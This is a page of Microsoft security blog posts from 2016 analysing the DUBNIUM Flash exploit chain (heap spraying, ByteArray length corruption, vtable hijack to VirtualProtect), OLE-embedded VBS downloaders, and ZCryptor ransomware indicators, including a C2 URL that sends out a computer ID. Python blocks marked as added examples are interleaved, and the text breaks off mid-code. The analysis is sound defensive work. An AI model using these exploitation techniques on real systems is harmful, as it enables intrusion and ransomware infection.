Trustworthy Computing Security and Privacy Blogs

This page consolidates and features blogs from Microsoft’s Trustworthy Computing (TwC) group, the team charged with working to deliver more secure, private and reliable computing experiences to customers and the globe. Drop by to read about Microsoft’s long-term vision and strategy for computing privacy and security.

Reverse-engineering DUBNIUM’s Flash-targeting exploit, 20 Jun 2016 20:30:20 +0000

The DUBNIUM campaign in December involved one exploit in the wild that affected Adobe Flash Player. In this blog, we’re going to examine the technical details of the exploit that targeted vulnerability CVE-2015-8651. For more details on this vulnerability, see Adobe Security Bulletin APSB16-01.

Note that Microsoft Edge on Windows 10 was protected from this attack due to the mitigations introduced into the browser.


Vulnerability exploitation

Adobe Flash Player version checks

The nature of the vulnerability is an integer overflow, and the exploit code has quite extensive subroutines in it. It tries to cover versions of the player from 11.x to the most recent version at the time of the campaign.

The earliest version of Adobe Flash Player 11.x was released in October 2011 and the last version of Adobe Flash Player 10.x was released in June 2013. This doesn’t necessarily mean the exploit existed from 2011 or 2013, but it again demonstrates the broad target range the exploit tries to cover.

Figure 1 Version check for oldest Flash Player the exploit targets

We focused our analysis mainly on the function named qeiofdsa, as the routine covers any Adobe Flash Player version since the one released on September 21, 2015.

Figure 2 Version check for latest Flash Player the exploit supports

Why is this version of Flash Player so important? Because it is the release that had the latest Vector length corruption hardening applied at the time of the incident. The original Vector length hardening came in an earlier release and is well explained in the Security @ Adobe blog.

The Vector object from Adobe Flash Player can be used as a corruption target to acquire read or write (RW) primitives.

This object has a very simple structure and predictable allocation patterns, without any sanity checks on the objects. This made it a very popular target for exploitation in recent years. There were a few more bypasses found after that hardening, and a later release had another bypass hardening. Since that newer version of Adobe Flash Player, the exploit uses a new exploitation method (ByteArray length corruption).

Note, however, that with new mitigation from Adobe released after this incident, the ByteArray length corruption method no longer works.

To better understand the impact of the mitigations on attacker patterns, we compared exploit code line counts for the pdfsajoe routine, which exploits Adobe Flash Player versions before the latest Vector hardening, to the qeiofdsa routine, which exploits versions after it. We learned that pdfsajoe has 139 lines of code versus qeiofdsa with 5,021.

While there is really no absolute way to measure the impact, and line count alone is not a standard measurement, we know that in order to target the newer versions of Adobe Flash Player the attacker had to write 36 times as many lines of code.

Subroutine name                 | pdfsajoe                     | qeiofdsa
Vulnerable Flash Player version | Below                        | and up
Mitigations                     | No latest Vector mitigations | Latest Vector mitigations applied
Lines of attack code            | 139 lines                    | 5,021 lines
Ratio                           | 1                            | 36

Table 1 Before and after Vector mitigation


This tells us a lot about the importance of mitigation and the increasing cost of exploit code development. Mitigation in itself doesn’t fix existing vulnerabilities, but it is definitely raising the bar for exploits.


Heap spraying and vulnerability triggering

The exploit relies heavily on heap spraying. Among the heap sprays of various objects, Figure 3 shows the code where the ByteArray objects are sprayed. Each ByteArray has a length of 0x10. These sprayed objects are the corruption targets.

Figure 3 Heap-spraying code

The vulnerability lies in the implementation of fast memory opcodes. More detailed information on the usage of fast memory opcodes is available in the Faster byte array operations with ASC2 article at the Adobe Developer Center.

After setting up application domain memory, the code can use avm2.intrinsics.memory. The package provides various methods, including the li32 and si32 instructions. The li32 instruction loads 32-bit integer values from fast memory and si32 stores 32-bit integer values to fast memory. These functions are used as methods, but at the AVM2 bytecode level they are opcodes themselves.

Figure 4 Setting up application domain memory

Due to the way these instructions are implemented, an out-of-bounds access vulnerability occurs (Figure 5). The key to this vulnerability is the second li32 statement that follows the first li32 statement in each IF statement. For example, in the li32((_local_4+0x7FEDFFD8)) statement, the _local_4+0x7FEDFFD8 value ends up as 4 after integer overflow. At the just-in-time (JIT) level, the range check is only generated for this li32 statement, skipping the range check JIT code for the first li32 statement.

Figure 5 Out-of-bounds access code using li32 instructions

We compared the bytecode-level AVM2 instructions with the low-level x86 JIT instructions. Figure 6 shows the comparison and our findings. Basically, two li32 accesses are made, and the JIT compiler optimizes the length check for both li32 instructions and generates only one length check. The problem is that an integer overflow happens, so the length check code becomes faulty and allows bypasses of the ByteArray length restrictions. This directly ends with out-of-bounds RW access to the process memory. Historically, the fast memory implementation has suffered range check vulnerabilities (CVE-2013-5330, CVE-2014-0497). The Virus Bulletin 2014 paper by Chun Feng and Elia Florio, Ubiquitous Flash, ubiquitous exploits, ubiquitous mitigation (PDF download), provides more details on other old but similar vulnerabilities.
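To make the length-check confusion concrete, here is an added Python model (not code from the post or from Adobe) of the two guarded li32 loads described above. It emulates 32-bit address wraparound, compares a merged check that guards only the second load against a per-access check, and uses the 0x7FEDFFD8 displacement from Figure 5; the fast-memory size and the value of _local_4 are constructed for the example. The merged check admits a read far outside the buffer, while the per-access check rejects it.

```python
# Constructed model of the fast-memory range check discussed above; not Flash code.
MASK32 = 0xFFFFFFFF


def wrap32(value):
    """Emulate 32-bit unsigned wraparound: AVM2 fast-memory addresses are 32-bit."""
    return value & MASK32


def single_check(addr, length):
    """Range check for one 4-byte li32 load at the (wrapped) address."""
    return wrap32(addr) + 4 <= length


def merged_check_allows(local4, displacement, length):
    """Model of the faulty optimization: only the access with the larger
    displacement is checked, on the assumption that it dominates the first
    access. With 32-bit wraparound the 'larger' address can be tiny, so the
    check passes while the first access is far out of bounds."""
    return single_check(local4 + displacement, length)


def correct_check_allows(local4, displacement, length):
    """Each load is checked against its own wrapped address; no ordering assumption."""
    return single_check(local4, length) and single_check(local4 + displacement, length)


def load_pair(fast_memory, local4, displacement, check):
    """Perform li32(local4) and li32(local4 + displacement) guarded by `check`.

    fast_memory is a bytes object standing in for the ApplicationDomain memory.
    Returns the two loaded words, or None if the guard rejected the accesses.
    If the guard is wrong, the model raises IndexError to mark the out-of-bounds read
    (real fast memory would silently read process memory here)."""
    length = len(fast_memory)
    if not check(local4, displacement, length):
        return None
    words = []
    for addr in (wrap32(local4), wrap32(local4 + displacement)):
        chunk = fast_memory[addr:addr + 4]
        if len(chunk) != 4:
            raise IndexError("out-of-bounds fast-memory read at 0x%08x" % addr)
        words.append(int.from_bytes(chunk, "little"))
    return tuple(words)


# Displacement from the blog; the value of _local_4 is constructed so that
# local4 + displacement == 0x1_0000_0004, which wraps to 4 in 32 bits.
DISPLACEMENT = 0x7FEDFFD8
LOCAL4 = wrap32(4 - DISPLACEMENT)  # 0x8012002C

if __name__ == "__main__":
    memory = bytes(0x1000)  # constructed 4 KiB fast-memory region
    print("wrapped second address: 0x%x" % wrap32(LOCAL4 + DISPLACEMENT))
    print("merged check passes:  ", merged_check_allows(LOCAL4, DISPLACEMENT, len(memory)))
    print("correct check passes: ", correct_check_allows(LOCAL4, DISPLACEMENT, len(memory)))
```

The fix the model points at is the one Adobe's later releases applied in spirit: every memory access is validated on its own effective (wrapped) address, and no check is elided on the assumption that one address is larger than another.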

Figure 6 Length check confusion

Using this out-of-bounds vulnerability, the exploit tries to locate heap-sprayed objects.

Figure 7 shows the last part of the memory-sweeping code. We counted 95 IF/ELSE statements that sweep through the memory range from ba+0x121028 to ba+0x17F028 (where ba is the base address of fast memory), which is 0x5E000 (385,024) bytes in size. These memory ranges are therefore critical for this exploit’s successful run.

Figure 7 End of memory sweeping code

Figure 8 shows a crash point where the heap spraying fails. The exploit heavily relies on a specific heap layout for successful exploitation, and the need for heap spraying is one element that makes this exploit unreliable.

Figure 8 Out-of-bounds memory access

This exploit corrupts the ByteArray.length field and uses the corrupted object as its RW primitive (Figure 9).

Figure 9 Instruction si32 is used to corrupt ByteArray.length field

After ByteArray.length corruption, it needs to determine which ByteArray is corrupt out of the sprayed ByteArrays (Figure 10).


Figure 10 Determining corrupt ByteArray

RW primitives

Figure 11 shows the various RW primitives that this exploit code provides. This extensive list of methods supports different application and operating system flavors.

Figure 11 RW primitives

For example, the read32x86 method can be used to read an arbitrary address in the process’s memory on the x86 platform. The cbIndex variable is the index into the bc array, which is an array of the ByteArray type. The bc[cbIndex] element is the specific ByteArray that was corrupted through the fast memory vulnerability. After setting the virtual address as the position member, the method uses readUnsignedInt to read the memory value.

Figure 12 Read primitive

The same principle applies to the write32x86 method. It uses the writeUnsignedInt method to write to an arbitrary memory location.

Figure 13 Write primitive

On top of these, the exploit can perform slightly more complex operations, such as reading multiple bytes using the readBytes method.

Figure 14 Byte reading primitive

Function object virtual function table corruption

Just after acquiring RW access to the process’s memory, the exploit tries to achieve code execution. It uses a very specific method of corrupting a Function object and using the apply and call methods of the object to achieve shellcode execution. This method is similar to the exploit method that was disclosed during the Hacking Team leak. Figure 15 shows how the Function object’s virtual function table pointer (vptr) is acquired through a leaked object address, and how low-level object offset calculations are performed. The offsets used here correspond to Adobe Flash Player’s internal data structures and how they are linked together in memory.

Figure 15 Resolving Function object vptr address

This leaked virtual function table pointer is later overwritten with a fake virtual function table’s address. The fake virtual function table itself is cloned from the original one; the only change is that the pointer to the apply method is replaced with the address of the VirtualProtect API. Later, when the apply method is called on the dummy function object, it actually calls the VirtualProtect API with the supplied arguments, not the original empty call body. The supplied arguments point to the memory area that is used for temporary shellcode storage. The area is made read/write/executable (RWX) through this method.

Figure 16 Call VirtualProtect through apply method

Once the RWX memory area is reserved, the exploit uses the call method of the Function object to perform further code execution. It doesn’t use the apply method because it no longer needs to pass any arguments. Calling the call method is also simpler (Figure 17).

Figure 17 Shellcode execution through call method

This shellcode-running routine is highly modularized: API names and their arguments can be passed to the shellcode-running utility function. This makes shellcode building and running very extensible. Again, this method closely resembles the code found in the Adobe Flash exploit leaked during the Hacking Team information leak in July 2015.

Figure 18 Part of shellcode call routines

Note that the exploit’s method of using the corrupted Function object virtual table doesn’t work on Microsoft Edge anymore as it has additional mitigation against these kinds of attacks.

ROP-less shellcode

With this exploit, the shellcode is not a single contiguous memory area; various shellcode pieces are invoked through separate call method invocations. As this exploit shows, we are observing more exploits operating without return-oriented programming (ROP) chains. We can track these calls by putting a breakpoint on the native code that performs the ActionScript call method. For example, the disassembly in Figure 19 shows the code that calls the InternetOpenUrlA API.


Figure 19 InternetOpenUrlA 1st download

This call only retrieves a portion of a portable executable (PE) file’s header, not the whole file. A second InternetOpenUrlA API call retrieves the remaining body of the payload. This is most likely a trick to confuse analysts who look for a single download session for payloads.

Figure 20 InternetOpenUrlA 2nd download

From the analysis of the Adobe Flash Player-targeting exploit used by DUBNIUM last December, we learned that they are using highly organized exploit code with extensive support for operating system flavors. However, some functionality for some operating systems is not yet implemented. For example, some 64-bit support routines had an empty function inside them.

The way the shellcode is authored makes the exploit code very extensible and flexible, as changing shellcode behavior is extremely simple, as simple as changing AS3 code lines.

The actual first-stage payload download is not performed in a single download but is split into two.

They also use the ByteArray.length corruption technique to achieve process memory RW access. There was a hardening upon this object just after this incident and ByteArray now has better sanity checks. Therefore, the same technique would not work as straightforwardly as in this exploit for the versions after the hardening.

The exploit relies heavily on heap-spraying techniques, and this is one major element that makes this exploit unreliable.

This is a good example of how mitigation undermines an exploit’s stability, and how it increases exploit development cost.

Because of the Function object corruption method the exploit relies on, Microsoft Edge provides additional protection against this new exploit method.


Jeong Wook Oh

Where’s the Macro? Malware authors are now using OLE embedding to deliver malicious files, 14 Jun 2016 22:24:00 +0000

We’ve seen reports of malicious files that misuse the legitimate Office object linking and embedding (OLE) capability to trick users into enabling and downloading malicious content. Previously, we’ve seen macros used in a similar manner, and this use of OLE might indicate a shift in behavior as administrators and enterprises mitigate against this infection vector with better security and new options in Office.

In these new cases, we’re seeing OLE-embedded objects and content surrounded by well-formatted text and images to encourage users to enable the object or content, and thus run the malicious code. So far, we’ve seen these files use malicious Visual Basic (VB) and JavaScript (JS) scripts embedded in a document.

The script or object is surrounded by text that encourages the user to click or interact with the script (which is usually represented with a script-like icon). When the user interacts with the object, a warning prompts the user whether to proceed or not. If the user chooses to proceed (by clicking Open), the malicious script runs and infection can occur.

Packager warning

Figure 1: Warning message prompts the users to check whether they should open the script or not.

It’s important to note that user interaction and consent are still required to execute the malicious payload. If the user doesn’t enable the object or click on it, the code will not run and an infection will not occur.

Education is therefore an important part of mitigation – as with spam emails, suspicious websites, and unverified apps. Don’t click the link, enable the content, or run the program unless you absolutely trust it and can verify its source.

In late May 2016, we came across the following Word document (Figure 2) that used VB script and language similar to that used in CAPTCHA and other human-verification tools.


Screenshot of an invitation to unlock contents

Figure 2: Invitation to unlock contents


It’s relatively easy for the malware author to replace the contents of the file (the OLE or embedded object that the user is invited to double-click or activate). We can see this in Figure 3, which indicates the control or script is a JS script.

A screenshot of a possible JavaScript variant

Figure 3: Possible JavaScript variant


The icon used to indicate the object or content can be just about anything. It can be a completely different icon that has nothing to do with the scripting language being used – as the authors can use any pictures and any type

Screenshot of an embedded object variant

Figure 4: Embedded object variant


It’s helpful to be aware of what this kind of threat looks like, what it can look like, and to educate users to not enable, double-click, or activate embedded content in any file without first verifying its source.

Technical details – downloading and decrypting a binary

In the sample we investigated, the content of the social engineering document is a malicious VB script, which we detect as TrojanDownloader:VBS/Vibrio and TrojanDownloader:VBS/Donvibs. This sample also distinguishes itself from the typical download-and-execute routine common to this type of infection vector: it has a “decryption function”.

This malicious VB script downloads an encrypted binary (bypassing any network-based protection designed to recognize malicious formats and block them), decrypts the binary, and then runs it. Figure 5 illustrates the encrypted binary we saw in this sample.

Screenshot of the encrypted binary

Figure 5: The encrypted binary


The embedded object or script downloads the encrypted file to %appdata% with a random file name, and proceeds to decrypt it using the script’s decryption function (Figure 6).

Screenshot of the decryption process, part 1

Screenshot of the decryption process, part 2

Screenshot of the decryption process, part 3

Figure 6: Decryption process

Lastly, it executes the now-decrypted binary, which in this example was Ransom:Win32/Cerber.

Screenshot of the decrypted Win32 executable

Figure 7: Decrypted Win32 executable


Our data shows these threats (TrojanDownloader:VBS/Vibrio and TrojanDownloader:VBS/Donvibs) are not particularly prevalent, with the greatest concentration in the United States.

We’ve also seen a steady decline since we first discovered it in late May 2016.

Worldwide prevalence of TrojanDownloader:VBS/Vibrio and TrojanDownloader:VBS/Donvibs

Figure 8: Worldwide prevalence

Daily prevalence of TrojanDownloader:VBS/Vibrio and TrojanDownloader:VBS/Donvibs

Figure 9: Daily prevalence


Prevention and recovery recommendations

Administrators can prevent activation of OLE packages by modifying the registry key HKCU\Software\Microsoft\Office\<Office Version>\<Office application>\Security\PackagerPrompt.

The Office version values should be:

  • 16.0 (Office 2016)
  • 15.0 (Office 2013)
  • 14.0 (Office 2010)
  • 12.0 (Office 2007)


Setting the value to 2 causes Office to disable packages; they won’t be activated if a user tries to interact with or double-click them.

The value options for the key are:

  • 0 – No prompt from Office when user clicks, object executes
  • 1 – Prompt from Office when user clicks, object executes
  • 2 – No prompt, Object does not execute

You can find details about this registry key in the Microsoft Support article.
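As an added example (not from the post or from Microsoft), the following Python audits an exported set of HKCU values for the PackagerPrompt setting described above and emits a .reg fragment that hardens every version/application combination. The Office application subkey names Word, Excel and PowerPoint, the export format (a path-to-value dictionary) and the sample values are assumptions made for this example; the version numbers and value meanings are the ones listed in the post.

```python
# Constructed audit of the PackagerPrompt setting; not a Microsoft tool.
OFFICE_VERSIONS = {'16.0': 'Office 2016', '15.0': 'Office 2013',
                   '14.0': 'Office 2010', '12.0': 'Office 2007'}
# Assumption for this example: the per-application subkeys to audit.
OFFICE_APPS = ('Word', 'Excel', 'PowerPoint')
# Value meanings as given in the post.
PACKAGER_PROMPT_MEANING = {
    0: 'no prompt from Office when user clicks, object executes',
    1: 'prompt from Office when user clicks, object executes',
    2: 'no prompt, object does not execute',
}


def packager_prompt_path(version, app):
    """Registry path of the PackagerPrompt value for one Office version and application."""
    return r'HKCU\Software\Microsoft\Office\%s\%s\Security\PackagerPrompt' % (version, app)


def audit(exported_values, installed_versions):
    """exported_values: {registry path: int} as exported from a user's hive (constructed here).
    installed_versions: the Office versions present on the host.
    Returns [(path, finding)] for every version/app whose packages can still activate.
    A missing value is reported too: nothing has been set to disable packages there."""
    findings = []
    for version in installed_versions:
        for app in OFFICE_APPS:
            path = packager_prompt_path(version, app)
            value = exported_values.get(path)
            if value == 2:
                continue  # hardened
            if value is None:
                findings.append((path, 'not set (package activation not disabled)'))
            else:
                meaning = PACKAGER_PROMPT_MEANING.get(value, 'unknown value')
                findings.append((path, 'value %d: %s' % (value, meaning)))
    return findings


def hardening_reg(versions=OFFICE_VERSIONS, apps=OFFICE_APPS):
    """Emit .reg text that sets PackagerPrompt=2 for every version/app combination."""
    lines = ['Windows Registry Editor Version 5.00', '']
    for version in versions:
        for app in apps:
            lines.append(r'[HKEY_CURRENT_USER\Software\Microsoft\Office\%s\%s\Security]'
                         % (version, app))
            lines.append('"PackagerPrompt"=dword:00000002')
            lines.append('')
    return '\n'.join(lines)


# Constructed export from a host with Office 2016 only: Word hardened, Excel still
# prompting, PowerPoint never configured.
SAMPLE_EXPORT = {
    packager_prompt_path('16.0', 'Word'): 2,
    packager_prompt_path('16.0', 'Excel'): 1,
}
SAMPLE_INSTALLED = ['16.0']


def run_audit():
    return audit(SAMPLE_EXPORT, SAMPLE_INSTALLED)


if __name__ == '__main__':
    for path, finding in run_audit():
        print('%s -> %s' % (path, finding))
    print()
    print(hardening_reg(SAMPLE_INSTALLED))
```

The audit deliberately treats an absent value as a finding rather than guessing what Office does by default, so the report only goes quiet once an administrator has explicitly set 2 everywhere.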


See our other blogs and our ransomware help page for further guidance on preventing and recovering from these types of attacks:



Alden Pornasdoro



June 2016 security update release, 14 Jun 2016 17:00:30 +0000

We released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to apply security updates as soon as they are released.

More information about this month’s security updates and advisories can be found in the Security TechNet Library.

MSRC team

Reverse-engineering DUBNIUM, 10 Jun 2016 01:43:56 +0000

DUBNIUM (which shares indicators with what Kaspersky researchers have called DarkHotel) is one of the activity groups that has been very active in recent years, and it has many distinctive features.

We located multiple variants of multiple-stage droppers and payloads in the last few months, and although they are not really packed or obfuscated in a conventional way, they use their own methods and tactics of obfuscation and distraction.

In this blog, we will focus on analysis of the first-stage payload of the malware.

As the code is very complicated and twisted in many ways, reverse-engineering the malware is a complex task. The complexity includes statically linking unrelated code (so that the malicious logic can hide in a big, benign code dump) and excessive use of an in-house encoding scheme. The bootstrap logic is also hidden in plain sight, such that it is easy to miss.

Every subroutine of the malicious code has a “memory cleaner routine” that runs when its logic ends. A memory snapshot of the process therefore does not disclose many more details than the static binary itself.

The malware is also very sneaky and sensitive to dynamic analysis. When it detects the presence of analysis toolsets, the executable bails out from further execution. Even binary instrumentation tools like PIN or DynamoRio prevent the malware from running. This effectively defeats many automation systems that rely on at least one of the toolsets the malware checks for. Avoiding these toolsets during analysis makes the overall investigation even more complex.

With this blog series, we want to discuss some of the simple techniques and tactics we’ve used to break down the features of DUBNIUM.

We acquired multiple versions of DUBNIUM droppers through our daily operations. They are evolving slowly, but basically their features have not changed over the last few months.

In this blog, we’ll be using sample SHA1: dc3ab3f6af87405d889b6af2557c835d7b7ed588 in our examples and analysis.

Hiding in plain sight

The malware used in a DUBNIUM attack is committed to disguising itself as a Secure Shell (SSH) tool. In this instance, it is attempting to look like a certificate generation tool. The file descriptions and other properties of the malware look convincingly legitimate at first glance.

Figure 1: SSH tool disguise

When it is run, the program actually dumps out dummy certificate files into the file system and, again, this can be very convincing to an analyst who is initially researching the file.

Figure 2 Create dummy certificate files

The binary is indeed statically linked with the OpenSSL library, such that it really does look like an SSH tool. The problem with reverse-engineering this sample starts from the fact that it has more than 2,000 functions, most of which are statically linked OpenSSL code without symbols.

Figure 3: DUBNIUM functions list

Figure 4 shows an example of one of these functions; note that it even has string references to the source code file name.

Figure 4: Code snippet that is linked from OpenSSL library

It can be extremely time-consuming just going through the dump of functions that have no meaning at all in the code, and this is only one of the more simplistic tactics this malware uses.

We can solve this problem using binary similarity calculation. This technique has been around for years for various purposes, and it can be used, for example, to detect code stolen from other copyrighted software.

The technique can also be used to find patched code snippets in software and to find code that was vulnerable to attack. In this instance, we use the same technique to clean up unnecessary code snippets from our advanced persistent threat (APT) analysis and make a reverse engineer’s life easier.

Many different algorithms exist for binary similarity calculation, but we are going to use one of the simplest approaches here. The algorithm first collects the op-code strings of each instruction in the function (Figure 5). It then concatenates the whole string and applies a hash algorithm to it. We used the SHA1 hash in this case.

Figure 5: Op code in the instructions

Figure 6 shows the Python-style pseudo-code that calculates the hash for a function. Sometimes an immediate constant operand is a valuable piece of information that can be used to distinguish similar but different functions, so the code also includes that value in the hash string. It uses our own utility function RetrieveFunctionInstructions, which returns a list of op-code and operand values from a designated function.

import hashlib
import idaapi

def CalculateFunctionHash(self, func_ea):
    # Concatenate the mnemonic of every instruction in the function; immediate
    # constants are appended too, so similar but distinct functions hash differently.
    # RetrieveFunctionInstructions is our own utility; here it is assumed to yield
    # (op, operands, drefs) per instruction, where drefs are the data references
    # of that instruction. Immediates are only hashed when there are no data refs,
    # since an immediate that is really an address changes between builds.
    hash_string = ''
    for (op, operands, drefs) in self.RetrieveFunctionInstructions(func_ea):
        hash_string += op
        if len(drefs) == 0:
            for operand in operands:
                if operand.Type == idaapi.o_imm:
                    hash_string += ('%x' % operand.Value)
    m = hashlib.sha1()
    m.update(hash_string.encode())
    return m.hexdigest()

Figure 6: Pseudo-code for CalculateFunctionHash

With these hash values calculated for the DUBNIUM binary, we can compare them with the hash values from the original OpenSSL library. We identified from the compiler-generated metadata that the version the sample is linked against is openssl-1.0.1l-i386-win. After gathering the same hashes from the OpenSSL library, we could import symbols for the matched functions. In this way, we removed most of the functions from our analysis scope.
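The matching step described above, as an added Python example (not the authors’ tooling): compute the opcode-sequence hash for every function in a sample, build a hash-to-symbol map from a library build that has symbols, and import only unambiguous matches, leaving the rest for manual analysis. The instruction listings, addresses and function names are constructed stand-ins for real disassembly, and this example uses plain (mnemonic, immediates) tuples rather than the IDAPython objects used in the post.

```python
import hashlib

# Constructed instruction listings, not real disassembly: each function is a list of
# (mnemonic, [immediate operands]) tuples, standing in for what a disassembler yields.


def function_hash(instructions):
    """SHA1 over the concatenated mnemonics (plus hex immediates) of one function."""
    hash_string = ''
    for op, immediates in instructions:
        hash_string += op
        for imm in immediates:
            hash_string += '%x' % imm
    return hashlib.sha1(hash_string.encode()).hexdigest()


def build_reference(library):
    """Map hash -> [symbol names] for a library that has symbols (a constructed stand-in
    for the matching OpenSSL build). Identical bodies under different names are kept
    as a list so an ambiguous symbol is never imported."""
    reference = {}
    for name, instructions in library.items():
        reference.setdefault(function_hash(instructions), []).append(name)
    return reference


def match_functions(sample, reference):
    """Return ({address: symbol} for unambiguous matches, set of unmatched addresses).
    The unmatched functions are the ones worth a reverse engineer's attention."""
    matched, unmatched = {}, set()
    for ea, instructions in sample.items():
        names = reference.get(function_hash(instructions), [])
        if len(names) == 1:
            matched[ea] = names[0]
        else:
            unmatched.add(ea)
    return matched, unmatched


# Constructed reference library (symbol -> instruction list). BN_add and BN_sub share
# a mnemonic skeleton and differ only in an immediate and a branch, which is exactly
# what hashing immediates is meant to separate.
REFERENCE_LIBRARY = {
    'BN_add': [('push', []), ('mov', []), ('cmp', [0x0]), ('jz', []),
               ('call', []), ('pop', []), ('retn', [])],
    'BN_sub': [('push', []), ('mov', []), ('cmp', [0x1]), ('jnz', []),
               ('call', []), ('pop', []), ('retn', [])],
    'EVP_Digest': [('push', []), ('sub', [0x20]), ('lea', []), ('call', []),
                   ('add', [0x20]), ('pop', []), ('retn', [])],
}

# Constructed sample: two functions identical to library code, one that is not.
SAMPLE_FUNCTIONS = {
    0x401000: REFERENCE_LIBRARY['BN_add'],
    0x401040: REFERENCE_LIBRARY['EVP_Digest'],
    0x401080: [('push', []), ('xor', []), ('mov', [0x4a]), ('loop', []),
               ('pop', []), ('retn', [])],
}


def triage():
    """Label the sample against the reference and report what is left to analyze."""
    return match_functions(SAMPLE_FUNCTIONS, build_reference(REFERENCE_LIBRARY))


if __name__ == '__main__':
    matched, unmatched = triage()
    for ea in sorted(matched):
        print('0x%x -> %s' % (ea, matched[ea]))
    print('functions left to analyze:', ['0x%x' % ea for ea in sorted(unmatched)])
```

Against a real binary the same loop runs over every function the disassembler enumerates, and the reference map is built once per library version (here the post identifies openssl-1.0.1l-i386-win); a mismatch between the library build and the one the sample actually links against shows up as a very low match rate rather than as wrong labels.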

Figure 7: OpenSSL functions

(This blog is continued on the next page)

Microsoft Bounty Program expansion – .NET Core and ASP.NET RC2 Beta Bounty, 07 Jun 2016 17:00:02 +0000

I have another exciting expansion of the Microsoft Bounty Program. Please visit to find out more. As we approach release for .NET Core and ASP.NET, we would like to get even more feedback from the security research community. We are offering a bounty on the .NET Core and ASP.NET Core RC2 Beta Build, which was announced on May 16, 2016.

The program highlights are:

  • Bounty applies to .NET Core, ASP.NET Core RC2 and any subsequent release candidates during the bounty period, or the final RTM version if released within the bounty period.
  • Supported platforms are Windows, OS X and Linux.
  • The bounty will run June 7, 2016 to September 7, 2016.
  • Bounty payouts will range from $500 USD to $15,000 USD.
  • You can install the RC2 from

This new bounty is in addition to our ongoing Nano Server beta, Online Services, and Mitigation Bypass and Bounty for Defense bounty programs. These additions are part of the rigorous security programs at Microsoft. Bounties are worked alongside the Security Development Lifecycle (SDL), the Operational Security Assurance (OSA) framework, regular penetration testing of our products and services, and security and compliance accreditations by third-party audits.

As always, the most up-to-date information about the Microsoft Bounty Programs can be found at and in the associated terms and FAQs.

Happy hacking!

Jason Shirk

BlueHat v16 Announced, 01 Jun 2016 19:59:41 +0000

We are pleased to announce our sixteenth BlueHat Security Conference, set for November 3-4, 2016 at the Microsoft Conference Center here in Redmond. BlueHat is a unique opportunity for Microsoft engineers and the security community to come together to learn about the current threat landscape and to challenge our thinking and the actions we take in security. This past January saw 1,000 participants from around the world engage in this forum. We are excited to formally begin the push for our next conference!

At this time we are also opening the call for papers. The blend of external and internal speakers who challenge us on the security issues pressing our customers is what makes this conference great. The call for papers will run June 1st through August 19th, 2016. We are looking for abstract submissions with clear calls to action for our engineering-focused audience. Some possible themes we are interested in seeing abstracts on are:

  • Virtualization & Cloud-based research, exploits, and defense
  • How customers are getting owned (case studies and research)
  • New Exploit techniques
  • Emerging Threats & Trends
  • Anti-exploitation techniques
  • Human Hacking & Defense
  • Identity & Authentication research, exploits, and defense
  • Infrastructure & IoT Security research, exploits, and defense
  • Machine learning & security analytics

The field for abstracts is wide open. Come challenge us and help to shape how Microsoft thinks about security! This year we have a new tool which should make submitting abstracts easier. There are also examples of what has worked well in the past for some of the specific requirements. Submit your abstracts here:   

Watch this blog over the summer as we will release more information and previews for BlueHat v16. We look forward to hearing from you and meeting again in November.


Phillip Misner,

Principal Security Group Manager, MSRC



Learn More About BlueHat v16 Call for Papers: BlueHat v16 CFP Instructions

Link (.lnk) to Ransom, 27 May 2016 05:17:43 +0000

We are alerting Windows users of a new type of ransomware that exhibits worm-like behavior. This ransomware leverages removable and network drives to propagate itself and affect more users. We detect this ransomware as Ransom:Win32/ZCryptor.A.


Infection vector

Ransom:Win32/ZCryptor.A is distributed through the spam email infection vector. It also gets installed on your machine through other macro malware* or fake installers (Flash Player setup).

Once ZCryptor is executed, it will make sure it runs at start-up:


zcrypt = {path of the executed malware}


It also drops autorun.inf on removable drives and a zcrypt.lnk in the start-up folder:

%User Startup%\zcrypt.lnk

along with a copy of itself as {Drive}:\system.exe and %APPDATA%\zcrypt.exe, and changes the file attributes to hide itself from the user in File Explorer.

For example: c:\users\administrator\appdata\roaming\zcrypt.exe


This ransomware displays the following ransom note to users in a dropped HTML file named How to decrypt files.html:

Screenshot of Win32/ZCryptor.A  ransom note


It will also target and encrypt files with the following extensions, changing the file extension to .zcrypt once it is done (for example, <originalfilename>.zcrypt):

.accdb .dwg .odb .raf
.apk .dxg .odp .raw
.arw .emlx .ods .rtf
.aspx .eps .odt .rw2
.avi .erf .orf .rwl
.bak .gz .p12 .sav
.bay .html .p7b .sql
.bmp .indd .p7c .srf
.cdr .jar .pdb .srw
.cer .java .pdd .swf
.cgi .jpeg .pdf .tar
.class .jpg .pef .tar
.cpp .jsp .pem .txt
.cr2 .kdc .pfx .vcf
.crt .log .php .wb2
.crw .mdb .png .wmv
.dbf .mdf .ppt .wpd
.dcr .mef .pptx .xls
.der .mp4 .psd .xlsx
.dng .mpeg .pst .xml
.doc .msg .ptx .zip
.docx .nrw .r3d .3fr


Infected machines have a mutex named zcrypt1.0. The mutex denotes that an instance of this ransomware is already running on the infected machine.

We have also seen a connection to the following URL. However, the domain was already down when we were testing:

http://<obfuscated>/rsa/rsa.php?computerid={Computer_ID}, where {Computer_ID} is an entry found inside a dropped file %APPDATA%\cid.ztxt

For example, c:\users\administrator\appdata\roaming\cid.ztxt
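The indicators listed above, turned into a host triage routine as an added Python example (not from the post): it classifies a constructed file inventory, mutex list and Run values against the paths, the .zcrypt extension, the ransom-note name and the mutex name given in the post, then returns a verdict. The verdict thresholds, the name of the Run value (taken from the "zcrypt = {path}" line above) and the sample host data are assumptions for this example.

```python
import re

# Indicators taken from the post; everything else here is a constructed example.
ZCRYPT_EXTENSION = '.zcrypt'
RANSOM_NOTE = 'how to decrypt files.html'
MUTEX_NAME = 'zcrypt1.0'
RUN_VALUE_NAME = 'zcrypt'  # assumed name of the start-up Run value

# File-system artifacts, matched on the tail of the path so any user profile or
# drive letter fits. Patterns are case-insensitive because NTFS paths are.
ARTIFACT_PATTERNS = {
    'appdata_copy':    re.compile(r'\\appdata\\roaming\\zcrypt\.exe$', re.I),
    'cid_file':        re.compile(r'\\appdata\\roaming\\cid\.ztxt$', re.I),
    'startup_lnk':     re.compile(r'\\startup\\zcrypt\.lnk$', re.I),
    'drive_root_copy': re.compile(r'^[a-z]:\\system\.exe$', re.I),
    'autorun_inf':     re.compile(r'^[a-z]:\\autorun\.inf$', re.I),
}


def classify_path(path):
    """Return an artifact label, 'encrypted_file', 'ransom_note', or None."""
    for label, pattern in ARTIFACT_PATTERNS.items():
        if pattern.search(path):
            return label
    name = path.rsplit('\\', 1)[-1].lower()
    if name.endswith(ZCRYPT_EXTENSION):
        return 'encrypted_file'
    if name == RANSOM_NOTE:
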